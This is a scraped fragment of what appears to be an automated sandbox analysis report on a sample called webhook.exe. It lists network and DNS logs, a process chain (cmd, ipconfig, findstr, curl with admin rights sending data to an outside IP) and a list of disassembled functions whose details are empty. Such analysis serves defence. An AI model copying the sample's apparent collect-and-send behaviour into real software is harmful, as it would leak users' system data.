Dec 16, 2024 08:30:10.588459015 CET | 49734 | 443 | 192.168.2.4 | 162.159.138.232 |
Dec 16, 2024 08:30:10.621907949 CET | 49734 | 443 | 192.168.2.4 | 162.159.138.232 |
Dec 16, 2024 08:30:10.621926069 CET | 443 | 49734 | 162.159.138.232 | 192.168.2.4 |
Dec 16, 2024 08:30:11.841404915 CET | 443 | 49734 | 162.159.138.232 | 192.168.2.4 |
Dec 16, 2024 08:30:11.841487885 CET | 49734 | 443 | 192.168.2.4 | 162.159.138.232 |
Dec 16, 2024 08:30:11.844814062 CET | 49734 | 443 | 192.168.2.4 | 162.159.138.232 |
Dec 16, 2024 08:30:11.844825983 CET | 443 | 49734 | 162.159.138.232 | 192.168.2.4 |
Dec 16, 2024 08:30:11.845093012 CET | 443 | 49734 | 162.159.138.232 | 192.168.2.4 |
Dec 16, 2024 08:30:11.847923994 CET | 49734 | 443 | 192.168.2.4 | 162.159.138.232 |
Dec 16, 2024 08:30:11.895327091 CET | 443 | 49734 | 162.159.138.232 | 192.168.2.4 |
Dec 16, 2024 08:30:12.365638971 CET | 443 | 49734 | 162.159.138.232 | 192.168.2.4 |
Dec 16, 2024 08:30:12.365770102 CET | 443 | 49734 | 162.159.138.232 | 192.168.2.4 |
Dec 16, 2024 08:30:12.365963936 CET | 49734 | 443 | 192.168.2.4 | 162.159.138.232 |
Dec 16, 2024 08:30:12.367583036 CET | 49734 | 443 | 192.168.2.4 | 162.159.138.232 |
Dec 16, 2024 08:30:12.367604017 CET | 443 | 49734 | 162.159.138.232 | 192.168.2.4 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Dec 16, 2024 08:30:10.441389084 CET | 64271 | 53 | 192.168.2.4 | 1.1.1.1 |
Dec 16, 2024 08:30:10.581599951 CET | 53 | 64271 | 1.1.1.1 | 192.168.2.4 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
Dec 16, 2024 08:30:10.441389084 CET | 192.168.2.4 | 1.1.1.1 | 0xa60e | Standard query (0) | A (IP address) | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
Dec 16, 2024 08:30:10.581599951 CET | 1.1.1.1 | 192.168.2.4 | 0xa60e | No error (0) | 162.159.138.232 | A (IP address) | IN (0x0001) | false | ||
Dec 16, 2024 08:30:10.581599951 CET | 1.1.1.1 | 192.168.2.4 | 0xa60e | No error (0) | 162.159.128.233 | A (IP address) | IN (0x0001) | false | ||
Dec 16, 2024 08:30:10.581599951 CET | 1.1.1.1 | 192.168.2.4 | 0xa60e | No error (0) | 162.159.135.232 | A (IP address) | IN (0x0001) | false | ||
Dec 16, 2024 08:30:10.581599951 CET | 1.1.1.1 | 192.168.2.4 | 0xa60e | No error (0) | 162.159.136.232 | A (IP address) | IN (0x0001) | false | ||
Dec 16, 2024 08:30:10.581599951 CET | 1.1.1.1 | 192.168.2.4 | 0xa60e | No error (0) | 162.159.137.232 | A (IP address) | IN (0x0001) | false |
|
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
0 | 192.168.2.4 | 49734 | 162.159.138.232 | 443 | 3340 | C:\Windows\System32\curl.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-12-16 07:30:11 UTC | 229 | OUT | |
2024-12-16 07:30:11 UTC | 57 | OUT | |
2024-12-16 07:30:12 UTC | 1356 | IN | |
2024-12-16 07:30:12 UTC | 211 | IN |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 0 |
Start time: | 02:30:08 |
Start date: | 16/12/2024 |
Path: | C:\Users\user\Desktop\webhook.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff650540000 |
File size: | 188'416 bytes |
MD5 hash: | 5765BDE6D3062B30890598996B671DB0 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | low |
Has exited: | true |
Target ID: | 1 |
Start time: | 02:30:08 |
Start date: | 16/12/2024 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff600a80000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 2 |
Start time: | 02:30:08 |
Start date: | 16/12/2024 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7699e0000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 3 |
Start time: | 02:30:09 |
Start date: | 16/12/2024 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff600a80000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 4 |
Start time: | 02:30:09 |
Start date: | 16/12/2024 |
Path: | C:\Windows\System32\ipconfig.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6e94b0000 |
File size: | 35'840 bytes |
MD5 hash: | 62F170FB07FDBB79CEB7147101406EB8 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
Has exited: | true |
Target ID: | 5 |
Start time: | 02:30:09 |
Start date: | 16/12/2024 |
Path: | C:\Windows\System32\findstr.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7de2e0000 |
File size: | 36'352 bytes |
MD5 hash: | 804A6AE28E88689E0CF1946A6CB3FEE5 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
Has exited: | true |
Target ID: | 6 |
Start time: | 02:30:09 |
Start date: | 16/12/2024 |
Path: | C:\Windows\System32\curl.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff60c910000 |
File size: | 530'944 bytes |
MD5 hash: | EAC53DDAFB5CC9E780A7CC086CE7B2B1 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
Has exited: | true |
Execution Graph
Execution Coverage: | 24.3% |
Dynamic/Decrypted Code Coverage: | 0% |
Signature Coverage: | 40.8% |
Total number of Nodes: | 989 |
Total number of Limit Nodes: | 43 |
Graph
Callgraph
Function 00007FF65054721C Relevance: 52.9, APIs: 17, Strings: 13, Instructions: 372libraryloaderCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF650541A08 Relevance: 42.2, APIs: 16, Strings: 8, Instructions: 181registrylibrarymemoryCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF650541D28 Relevance: 37.1, APIs: 10, Strings: 11, Instructions: 373memoryCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF65054521C Relevance: 35.3, APIs: 14, Strings: 6, Instructions: 299memorystringCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF650545810 Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 183synchronizationCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF650545B50 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 218COMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF650544BE0 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 124windowCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6505446E8 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 152libraryfileloaderCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF650544BDE Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 86windowCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6505441EC Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 121COMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF650547FE4 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 81libraryloadershutdownCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6505426B8 Relevance: 12.1, APIs: 8, Instructions: 121filestringCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6505443CC Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 97registryfileCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF650547010 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 114processsynchronizationCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF650544FD8 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 88fileCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6505456C8 Relevance: 12.1, APIs: 5, Strings: 3, Instructions: 75memoryCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF650548400 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 164filestringCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6505481D1 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 124timeCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF650545ED8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 90memoryCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF650544598 Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 71memorystringCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6505434D8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6505478AE Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 177windowCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF650542590 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 69librarymemoryloaderCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6505433BC Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 64shutdownCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6505418E4 Relevance: 9.0, APIs: 6, Instructions: 49timethreadCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF65054170E Relevance: 1.5, APIs: 1, Instructions: 7COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF650546768 Relevance: 23.2, APIs: 10, Strings: 3, Instructions: 477COMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF65054499E Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 120threadwindowCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF650543950 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 141libraryloaderCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF650542D34 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 149registryCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF650543118 Relevance: 16.6, APIs: 11, Instructions: 125memoryCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6505461E8 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 180memorywindowCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF650548BB4 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109registryCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF650547BB8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 70COMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF650543044 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48COMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF650544E34 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 55memoryCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6505465B8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 48libraryCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF650546E4F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77fileCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF650547E28 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69COMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF650542F8C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41registryCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|